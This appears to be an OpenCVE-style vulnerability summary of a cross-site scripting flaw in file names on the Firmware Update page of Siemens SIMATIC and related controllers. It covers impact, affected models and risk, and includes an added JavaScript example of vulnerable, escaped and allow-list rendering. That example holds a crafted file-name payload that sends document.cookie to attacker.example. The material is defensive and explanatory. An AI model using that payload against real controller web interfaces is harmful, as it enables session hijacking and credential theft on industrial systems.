Impact
The flaw stems from a failure to validate and sanitize file names on the Firmware Update page of the affected Siemens industrial controllers. A remote attacker can socially engineer an operator into selecting a firmware file whose name carries a crafted payload. When the operator selects that file for upload, the unsanitized file name is rendered into the page and the JavaScript embedded in it executes in the context of the operator's authenticated session, allowing the attacker to hijack the session or steal credentials. This is a classic cross-site scripting (CWE-79) weakness; it compromises the confidentiality and integrity of user sessions on the device's web interface.
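The reflection described above, as an added illustration that is not Siemens code and not taken from the advisory: a page script that shows the selected file name by concatenating it into markup (the vulnerable pattern), beside an escaped rendering and an allow-list check that rejects names outside the expected shape. The function names, the page layout, the crafted file name and the firmware naming pattern are assumptions made for the example; it runs under Node without a browser.

```javascript
// Added example, not from the page or the vendor. Models the "selected file
// name rendered into the Firmware Update page" flaw (CWE-79) and a fix.

// Constructed sample inputs. The payload lives in the file NAME, not in the
// firmware image: the operator only has to select the file for it to fire.
const CRAFTED_NAME =
  'S71500_V3.1.upd"><img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';
const BENIGN_NAME = '6ES7518-4AP00-0AB0_V03.01.00.upd';

// Vulnerable pattern: the file name is dropped into HTML by string
// concatenation, so any markup in the name is parsed as markup.
function renderSelectedFileVulnerable(fileName) {
  return '<p>Selected firmware: <span id="fw-name">' + fileName + '</span></p>';
}

// Escape the five characters that matter in text and attribute context.
// In a real page, prefer textContent / setAttribute over building markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSelectedFileEscaped(fileName) {
  return '<p>Selected firmware: <span id="fw-name">' + escapeHtml(fileName) + '</span></p>';
}

// Allow-list validation: a firmware file name has a narrow, known shape.
// This pattern is an assumption; use the vendor's real naming convention.
const FIRMWARE_NAME_RE = /^[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.upd$/;

function isValidFirmwareName(fileName) {
  return FIRMWARE_NAME_RE.test(fileName);
}

// Hardened flow: reject anything outside the allow-list before it reaches the
// DOM, and escape what is accepted as defence in depth. The rejection message
// deliberately does not echo the offending name (that would be a second sink).
function renderSelectedFileHardened(fileName) {
  if (!isValidFirmwareName(fileName)) {
    return '<p class="error">Rejected: file name contains disallowed characters.</p>';
  }
  return renderSelectedFileEscaped(fileName);
}

// Detection helper for the example: list element names opened in a fragment.
// The templates above only ever open <p> and <span>, so any other tag name
// must have come from the file name.
function openedTags(html) {
  return [...html.matchAll(/<([a-z][a-z0-9]*)\b/gi)].map((m) => m[1].toLowerCase());
}

function hasInjectedTag(html) {
  return openedTags(html).some((t) => t !== 'p' && t !== 'span');
}

console.log('vulnerable:', renderSelectedFileVulnerable(CRAFTED_NAME));
console.log('hardened  :', renderSelectedFileHardened(CRAFTED_NAME));
console.log('benign    :', renderSelectedFileHardened(BENIGN_NAME));
```

The allow-list check is the real fix; the escaping is the safety net for the case where a name that passes validation still reaches a different sink (for example an attribute built elsewhere in the page). Either one alone would have prevented the script in the crafted name from executing, which is why a file-name sink should carry both.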
Affected Systems
All Siemens SIMATIC Drive Controller CPUs named in the advisory (e.g., 1504D TF, 1507D TF), the entire ET 200SP CPU family (1510SP, 1511SP, 1512SP, 1514SP, 1515SP, 1516SP, 1517SP, 1518SP and the 1514SPT variants), the S7‑1500 CPU series (models such as 1511‑1, 1512C‑1, 1513‑1, 1515‑2, 1516‑3, 1517‑3, 1518‑4 and related variants), every ET 200pro CPU (1513PRO, 1516PRO), many S7‑1500 software controller models (including the Linux and V2/V3 releases), and all SIPLUS and other variant models referenced. No version ranges are given, so every device in the listed families should be treated as vulnerable until the corrective update is applied.
Risk and Exploitability
The CVSS score of 7.2 places the vulnerability in the High severity band. No EPSS score is available and the vulnerability is not in the CISA Known Exploited Vulnerabilities (KEV) catalog, so there is no evidence of in‑the‑wild exploitation at this time; that is not the same as proof that no exploit exists. The attack vector is remote, via the controller's web interface, but the attacker must persuade an authenticated operator to select the malicious firmware file. The probability of successful exploitation is therefore moderate, limited by the required user interaction, while the consequence is severe because the injected script runs with the victim's session privileges on an industrial controller.
OpenCVE Enrichment